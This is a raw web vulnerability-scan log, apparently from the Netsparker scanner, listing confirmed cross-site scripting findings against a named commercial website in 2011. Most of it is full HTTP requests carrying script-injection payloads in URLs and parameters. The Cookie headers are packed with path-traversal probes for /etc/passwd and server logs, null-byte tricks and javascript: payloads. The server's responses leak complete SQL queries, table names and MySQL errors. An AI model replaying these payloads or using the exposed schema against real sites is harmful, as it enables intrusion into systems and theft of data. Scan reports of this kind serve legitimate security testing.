GET /ppc/leadflow/parl00/project.php?catId=10002&iusrc=iupsc&nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005E3)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:27:11 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=9n0s2keokcfhgkk29m6fhfgla4; path=/
Content-Length: 3383
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005E3)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005E3)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005E3)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005E3)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005E3)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005E3)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join 
sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005E3)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005E3)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005E3)</script>' OR prj.project_page_url = 'leadflow/parl00/project.php?catId=10002&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005E3)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005E3)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/lodi00/

/ppc/leadflow/lodi00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/lodi00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
nsextt GET '"--></style></script><script>alert(0x0005E4)</script>

Request

GET /ppc/leadflow/lodi00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005E4)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/lodi00/project.php?catId=110003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:27:11 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=kobk2emk8c8r7cv44iuomtik95; path=/
Content-Length: 3033
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/?nsextt='"--></style></script><script>netsparker(0x0005E4)</script>' OR prj.project_page_url = 'leadflow/lodi00/?nsextt='"--></style></script><script>netsparker(0x0005E4)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/?nsextt='"--></style></script><script>netsparker(0x0005E4)</script>' OR prj.project_page_url = 'leadflow/lodi00/?nsextt='"--></style></script><script>netsparker(0x0005E4)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/?nsextt='"--></style></script><script>netsparker(0x0005E4)</script>' OR prj.project_page_url = 'leadflow/lodi00/?nsextt='"--></style></script><script>netsparker(0x0005E4)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where 
prj.project_page_url = 'leadflow/lodi00/?nsextt='"--></style></script><script>netsparker(0x0005E4)</script>' OR prj.project_page_url = 'leadflow/lodi00/?nsextt='"--></style></script><script>netsparker(0x0005E4)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/?nsextt='"--></style></script><script>netsparker(0x0005E4)</script>' OR prj.project_page_url = 'leadflow/lodi00/?nsextt='"--></style></script><script>netsparker(0x0005E4)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005E4)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/lodi00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005E9)%3C/script%3E

/ppc/leadflow/lodi00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005E9)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/lodi00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0005E9)</script>

Request

GET /ppc/leadflow/lodi00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005E9)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/lodi00/project.php?catId=110003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:27:37 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=jd478v660jcgug5ko2fjm30ni5; path=/
Content-Length: 2953
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/'"--></style></script><script>netsparker(0x0005E9)</script>' OR prj.project_page_url = 'leadflow/lodi00/'"--></style></script><script>netsparker(0x0005E9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/'"--></style></script><script>netsparker(0x0005E9)</script>' OR prj.project_page_url = 'leadflow/lodi00/'"--></style></script><script>netsparker(0x0005E9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/'"--></style></script><script>netsparker(0x0005E9)</script>' OR prj.project_page_url = 'leadflow/lodi00/'"--></style></script><script>netsparker(0x0005E9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 
'leadflow/lodi00/'"--></style></script><script>netsparker(0x0005E9)</script>' OR prj.project_page_url = 'leadflow/lodi00/'"--></style></script><script>netsparker(0x0005E9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/'"--></style></script><script>netsparker(0x0005E9)</script>' OR prj.project_page_url = 'leadflow/lodi00/'"--></style></script><script>netsparker(0x0005E9)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005E9)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/lodi00/

/ppc/leadflow/lodi00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/lodi00/?'"--></style></script><script>alert(0x0005EB)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0005EB)</script>

Request

GET /ppc/leadflow/lodi00/?'"--></style></script><script>netsparker(0x0005EB)</script> HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/lodi00/project.php?catId=110003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:27:41 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=sf5kk8qr44so661fricsd0ekh4; path=/
Content-Length: 2963
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/?'"--></style></script><script>netsparker(0x0005EB)</script>' OR prj.project_page_url = 'leadflow/lodi00/?'"--></style></script><script>netsparker(0x0005EB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/?'"--></style></script><script>netsparker(0x0005EB)</script>' OR prj.project_page_url = 'leadflow/lodi00/?'"--></style></script><script>netsparker(0x0005EB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/?'"--></style></script><script>netsparker(0x0005EB)</script>' OR prj.project_page_url = 'leadflow/lodi00/?'"--></style></script><script>netsparker(0x0005EB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 
'leadflow/lodi00/?'"--></style></script><script>netsparker(0x0005EB)</script>' OR prj.project_page_url = 'leadflow/lodi00/?'"--></style></script><script>netsparker(0x0005EB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/?'"--></style></script><script>netsparker(0x0005EB)</script>' OR prj.project_page_url = 'leadflow/lodi00/?'"--></style></script><script>netsparker(0x0005EB)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005EB)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/lodi00/project.php

/ppc/leadflow/lodi00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/lodi00/project.php?catId=110003&iusrc=iupsc&nsextt='%22--%3E%3C..

Parameters

Parameter Type Value
catId GET 110003
iusrc GET iupsc
nsextt GET '"--></style></script><script>alert(0x0005EC)</script>

Request

GET /ppc/leadflow/lodi00/project.php?catId=110003&iusrc=iupsc&nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005EC)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:27:54 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=tqvtmqj5ticci6vl0b6etokil3; path=/
Content-Length: 3393
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005EC)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005EC)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005EC)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005EC)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005EC)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005EC)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left 
join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005EC)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005EC)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005EC)</script>' OR prj.project_page_url = 'leadflow/lodi00/project.php?catId=110003&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005EC)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005EC)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/lodi00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005EE)%3C/script%3E

/ppc/leadflow/lodi00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005EE)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/lodi00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3..

Parameters

Parameter Type Value
catId GET 110003
iusrc GET iupsc
URI-BASED Raw URI '"--></style></script><script>alert(0x0005EE)</script>

Request

GET /ppc/leadflow/lodi00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005EE)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
